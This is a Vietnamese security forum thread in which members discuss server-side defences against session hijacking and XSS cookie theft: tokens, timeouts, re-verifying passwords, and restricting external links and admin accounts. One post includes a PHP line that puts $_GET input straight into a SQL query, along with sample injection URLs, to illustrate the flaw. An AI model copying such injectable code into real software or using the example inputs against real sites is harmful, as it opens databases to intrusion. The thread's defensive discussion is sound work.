Điểm này hoàn toàn đúng. Tuy vậy, vấn đề nằm ở chỗ xác định sự cân bằng giữa đòi hỏi bảo mật và tiện dụng của một ứng dụng. Một ứng dụng online banking cần "transaction authentication" là điều cần thiết bởi vì mỗi cú bấm đều critical. Đối với một forum, tính critical không cao đến thế. Nếu đặt tính critical của một forum lên mức đòi hỏi "transaction authentication" thì nó bị mất tính linh động và dễ dùng. Đứng về mặt technology, mình có thể vận dụng nhiều phương pháp để giải quyết tình trạng hijacking. Cái khó là duy trì được mức transparent và friendly trong quá trình sử dụng. 

Do đó, tôi nghĩ bây giờ phải assump là, người dùng sẽ bị chôm credential, trong trường hợp này là attacker có thể tạo ra một request hoàn toàn bình thường như người dùng. Câu hỏi là có cách nào kiểm tra request đó ở phía server hay không? Có nhiều cách, tùy theo từng hoàn cảnh, chẳng hạn như: - đối với các hệ thống tài chính, ngân hàng, họ đều triển khai một hệ thống gọi là "fraud detection system", tạm dịch là hệ thống phát hiện gian lận. Hệ thống này được xây dựng dựa trên nền tảng của AI, có khả năng tìm hiểu, phân tích, học và adapt theo thói quen của người dùng. Ví dụ như họ phân tích thói quen tiêu tiền của tôi là lần nào cũng rút tiền từ ATM ra cao lắm là 2 triệu, tại một trong 2 máy ATM gần chỗ làm. Nếu một ngày nào đó, tự nhiên ai đó rút ra hết tiền của tôi, tại một máy ATM ở...Lạng Sơn chẳng hạn, hệ thống sẽ báo động và ngừng giao dịch đó lại. 

mrro wrote:

Đương nhiên xây dựng một hệ thống như thế đòi hỏi tiền bạc, thời gian, nhân lực và rõ ràng là không thể áp dụng cho HVAOnline. - đối với một hệ thống như HVAOnline, chúng ta có thể điều chỉnh bằng các rule, chẳng hạn như: + ủy thác thực hiện các chức năng quan trọng vào một lớp IP nhất định. + trước khi thực hiện bất kỳ chức năng nào, phải verify lại mật khẩu. + tách bạch giữa account quản lý và account sinh hoạt trên diễn đàn (chẳng hạn như "quanlytruong") + ...  

Điểm thứ 1 ok, đã áp dụng (như điểm thứ 3). Điểm thứ 2 hơi kẹt ;). Điểm thứ 3 gần giống điểm thứ 1. Hầu hết các chức năng quan trọng đều nằm trong administrator account và nó được "quản chế" khá chặt. Các account moderators có thể làm được một số công tác quan trọng khác nhưng không thể làm hàng loạt được :). Đây là nguyên tắc bảo mật căn bản. 

boom_jt wrote:

hì hì, bồ cứ đưa đoạn mã bị sql inj, mình đảm bảo fix đc á :P xss như đoạn bồ vừa nói là 1 trường hợp rất hay, (cũng filter đc chớ :P giả dụ ko cho thực hiện câu javascript tiếp theo bằng dấu ; - js mà ko có ; thì có thực hiện tiếp đc ko nhỉ :-/) @mR.Bi: lọc hết js thì mất hết hay của web rùi còn gì :D 

hehe, XSS mà bồ đi lọc dấu chấm phẩy àh? Hay là thấy trường hợp của tui rồi mới nảy ra ý lọc dấu chấm phẩy (j/k). Còn đoạn code bị SQL injection là thế này đây Tui có một website về 1 giải bóng đá (WC 2010) chẳng hạn: giải đấu được chia ra làm 10000 bảng: #:S muốn xem thông tin các đội trong 1 bảng, ví dụ bảng A đi: thì truy cập URL: http://football.com/info.php?table=A trong source-code $sql="select * from $_GET[table]"; ....... hehe, lúc đó hacker tấn công SQL injection ở mức cơ bản http://football.com/info.php?table=Admin hoặc http://football.com/info.php?table=Infomation_schema.tables ..... thì bồ xây dựng bộ lọc SQL injection trong trường hợp này thế nào ?? :D @vivashadow: Bồ làm một bài về httpOnly đi, tui có nhiều thắc mắc về nó :D  

...... Sao lại không lọc được, chỉ cần tạo mảng chứa các table nhạy cảm hoặc có thể đặt tên table như: _A, _B $sql="select * from _".$_GET[table]; Trong PHP có hỗ trợ session_ regenerate_ id, có thể sau 3 request thì tạo lại session_id. Mod vào xem bài viết (1), thực hiện xóa bài (2), trở về lại(3). Tuy nhiên cách này lại xung đột với token nếu thao tác kiểu inline mod. session_id đã đổi nhưng giá trị token của trang hiện tại vẫn còn vì chưa load lại trang.  

HVA còn lờ đi phần Ghi nhớ, chứ nếu có nữa thì còn nhiều vấn đề phải bàn. Không có tính năng này thì ít ra cũng nên đặt Login box bên ngoài để login cho nhanh, chứ cứ mỗi lần phải vào Đăng nhập thì rất mất cảm tình.  

p/s: Theo mình thì khó mà chống mất cookie, mình chơi nghệ sĩ hơn là có lấy được nhưng không xài được -:-)  

Biết chết liền :D Đợi 3 lần thì quá lâu, cái class này làm luôn 1 lần. www.phpclasses.org/browse/package/2794.html Cần có ví dụ cụ thể về cuộc tấn công của member kia, chứ vầy thì lẫn lộn giữa XSS và session hijacking + XSS Cố tình lờ đi cái Ghi nhớ chắc là sợ bị flood hoặc gì gì đó :D p/s: Cái editor của forum này chuối thật, không nhận biết được con trỏ đang ở đâu, lúc nào nó cũng chèn vào cuối bài viết. 

Biết chết liền :D Đợi 3 lần thì quá lâu, cái class này làm luôn 1 lần. www.phpclasses.org/browse/package/2794.html Cần có ví dụ cụ thể về cuộc tấn công của member kia, chứ vầy thì lẫn lộn giữa XSS và session hijacking + XSS Cố tình lờ đi cái Ghi nhớ chắc là sợ bị flood hoặc gì gì đó :D p/s: Cái editor của forum này chuối thật, không nhận biết được con trỏ đang ở đâu, lúc nào nó cũng chèn vào cuối bài viết. 

... p/s: @prof: mình chưa hiểu rõ lắm ý tưởng timestamp của bồ, có thể nói rõ thêm cho mình hiểu chút đc ko, sozy :) 

hì, mình chưa rõ là cụ thể (:P) cái timestamp đó đc implement thế nào :-? nội dung truyền giữa client và server là tn? 

Mình đoán ý bạn thế này: mình sẽ sử dụng 1 khái niệm gọi là timeout, cookie sẽ chỉ hợp lệ trong 1 khoảng thời gian nhất định đúng ko? Sau khoảng thời gian đó, cookie ko còn hợp lệ, và như vậy kẻ tấn công không thể làm gì đc với cookie ko còn hợp lệ đó? 

Vậy thì khi quá thời gian đó, phải chăng người dùng sẽ lại phải nhập username/password để có 1 cookie hợp lệ mới (có bất tiện cho người dùng quá ko? :-?), hay bạn sẽ thực thi cơ chế nào đó ? Mình nghĩ nên đi chi tiết vào vấn đề này để làm rõ khả năng ngăn ngừa session hijacking của phương pháp. Cơ chế timeout này cũng đã đc áp dụng (yahoo! mail chẳng hạn), tuy nhiên thời gian timeout có thể là 1 ngày (khá dài), đủ để kẻ tấn công làm đc điều hắn muốn ... 

Em nghĩ có thể kết hợp thêm yếu tố Timestamp (chẳng hạn, khoảng 30 giây) cho securityHash/token (có tính duy nhất cho 1 session) hiện tại của diễn đàn. Theo đó, phía server sẽ lưu giữ một table các securityHash này và sẽ không chấp nhận một request nào đó nếu giá trị securityHash đã và đang được dùng trước đó. Table này sẽ chỉ lưu các securityHash trong khoảng thời gian của Timestamp sau đó sẽ được giải phóng mà không chiếm tài nguyên. Trong trường hợp nhận được 2 requests với 2 securityHash giống nhau (bị session hijack), khi đó server-side nên cân nhắc trường hợp reject cả hai request này (vì khi đó không rõ request nào là hợp lệ) hoặc tiến hành verify lại password. 

2- Khi chỉ xem forum, post bài, các Admin. không nên truy cập vào HVA forum dứoi nickname- password của một Administrator, với quyền hạn như của một "root", mà chỉ nên truy cập vào dưới nickname và password với quyền hạn như của một Mod. Còn khi config. lại Forum mới dùng quyền của Admin-root.  

Bàn về cách này của bác Mai ví dụ như kẻ tấn công đã có chủ ý và lỗi đó bị khai thác trong phần chữ ký chẳng hạn thì kẻ đó hoàn toàn có thể gởi một PM trực tiếp đến tài khoản có quyền quản trị cao nhất (chẳng hạn như quanlytruong) chẳng hạn thì khi (quanlytruong) đọc tin nhắn có kèm theo chữ ký thì hoàn toàn đã bị hacker cướp được. và lúc đó Hacker đang vẫn có thể khai thác với quyền tối cao.  

Để "sống chung với XSS" (nếu ta muốn như vậy hay bắt buộc phải như vậy), thì tôi sẽ theo một giải pháp khác, xuất phát từ việc phân tích nguyên lý khai thác lỗi XSS của hacker. Tôi sẽ tìm cách để thành phần thứ 3 (tức là hacker với công cụ webserver của hacker) trong quá trình exploit scenarios, không thể phát huy bất cứ một tác dụng gì. Nghĩa là làm cho nó vô dụng. Để làm việc này tôi đã đề cập một số giải pháp (không cho insert hình ảnh upload trên các webserver khác vào HVA forum, không cho đặt link trên forum để chỉ cần click vào link là có thể kết nối đến các webserver khác, trừ các link nội bô ...vân vân). Chúng ta để ý sẽ thấy rằng các trang chủ của các công ty kinh doanh tên miền nổi tiếng thường thiết kế rất đơn giản (không hề có animation pic. hay flash gì cả), không hề hiện diện một link "sống" nào, trừ các link nội bộ. Vì các trang chủ này thường có nơi Login vào "Domain control panel", mà trong trừong hợp này thì nickname và pass của một user là tối quan trọng. Cũng như đã có một số website của chính phủ Mỹ, khi user chỉ chuột vào một link liên kết với một webserver bên ngoài, thì lập tức có một cửa sổ popup hiện ra, với cảnh báo đại thể là: "Bạn đang rời website của chúng tôi để truy cập đến một website-webserver bên ngoài. Chúng tôi cảnh báo việc này và không chịu trách nhiệm nếu như việc này có thể gây tổn thất, rắc rối... cho bạn". Các website này chắc đã thấy rõ tầm quan trọng của lỗi XSS cũng như việc khó loại bỏ hết lỗi XSS trong website của mình. Một số website khác cho phép user post các link tham khảo, nhưng không được dưới dạng "Hyperlink" mà dưới dạng text. Ngừoi đọc phải copy và dán lên một cửa sổ trình duyệt mới mở ra. Ngoài ra nếu tạo điều kiện cho user được insert hình ảnh lên HVA forum thuận tiện, dễ dàng thì có lẽ sau này HVA nên có một "file uploading server" riêng. Tạo cái này thưc ra không khó.  

PXMMRF wrote:

Để "sống chung với XSS" (nếu ta muốn như vậy hay bắt buộc phải như vậy), thì tôi sẽ theo một giải pháp khác, xuất phát từ việc phân tích nguyên lý khai thác lỗi XSS của hacker. Tôi sẽ tìm cách để thành phần thứ 3 (tức là hacker với công cụ webserver của hacker) trong quá trình exploit scenarios, không thể phát huy bất cứ một tác dụng gì. Nghĩa là làm cho nó vô dụng. Để làm việc này tôi đã đề cập một số giải pháp (không cho insert hình ảnh upload trên các webserver khác vào HVA forum, không cho đặt link trên forum để chỉ cần click vào link là có thể kết nối đến các webserver khác, trừ các link nội bô ...vân vân). Chúng ta để ý sẽ thấy rằng các trang chủ của các công ty kinh doanh tên miền nổi tiếng thường thiết kế rất đơn giản (không hề có animation pic. hay flash gì cả), không hề hiện diện một link "sống" nào, trừ các link nội bộ. Vì các trang chủ này thường có nơi Login vào "Domain control panel", mà trong trừong hợp này thì nickname và pass của một user là tối quan trọng. Cũng như đã có một số website của chính phủ Mỹ, khi user chỉ chuột vào một link liên kết với một webserver bên ngoài, thì lập tức có một cửa sổ popup hiện ra, với cảnh báo đại thể là: "Bạn đang rời website của chúng tôi để truy cập đến một website-webserver bên ngoài. Chúng tôi cảnh báo việc này và không chịu trách nhiệm nếu như việc này có thể gây tổn thất, rắc rối... cho bạn". Các website này chắc đã thấy rõ tầm quan trọng của lỗi XSS cũng như việc khó loại bỏ hết lỗi XSS trong website của mình. Một số website khác cho phép user post các link tham khảo, nhưng không được dưới dạng "Hyperlink" mà dưới dạng text. Ngừoi đọc phải copy và dán lên một cửa sổ trình duyệt mới mở ra. Ngoài ra nếu tạo điều kiện cho user được insert hình ảnh lên HVA forum thuận tiện, dễ dàng thì có lẽ sau này HVA nên có một "file uploading server" riêng. Tạo cái này thưc ra không khó.  

Yeah! Yeah! Yeah! Ý kiến của mình ở trên chính là muốn Admin khai triển điều này. (chỉ có điều mình chưa diễn đạt được như đồng chí PXMMRF ):D Cảm ơn bạn PXMMRF. 

Theo tôi thì giải pháp này nghiên về hướng phòng chống XSS, không cho nó xảy ra. Đây là những biện pháp tốt nhưng chủ đề mình đang bàn là: giả sử mình bị XSS và chưa khắc phục thì ở phía server mình có thể làm những gì để ngăn cản hoặc giảm thiểu dung hại tình trạng session bị hijack do mất cookie. Tất nhiên phòng cháy hơn chữa cháy. Việc ngăn ngừa XSS xảy ra và ưu tiên một nhưng cái scope để bàn luận ở đây không phải là các phương pháp ngăn ngừa XSS. :P  

Mình nghĩ cách dùng password thứ hai khá hay. VD ta cho nó gồm 2 chữ số và trong mỗi tao tác quản trị thì verify lại pass này. Vì pass phụ chỉ có 2 chữ số nên ko gây nhiều quá nhiều cản trở như việc nhập lại pass chính (passwd của các admin và mod trên forum thì có lẽ khá rắc rối).  

í em còn quên cái này,các anh chỉ dùm em luôn,em thấy các anh bảo là chỉ cần view sorce là có thể thấy được sessionID mà em tìm mãi mà kô thấy cái sesionID nào cả,thử mấy trang rồi.mong chỉ giúp ạ.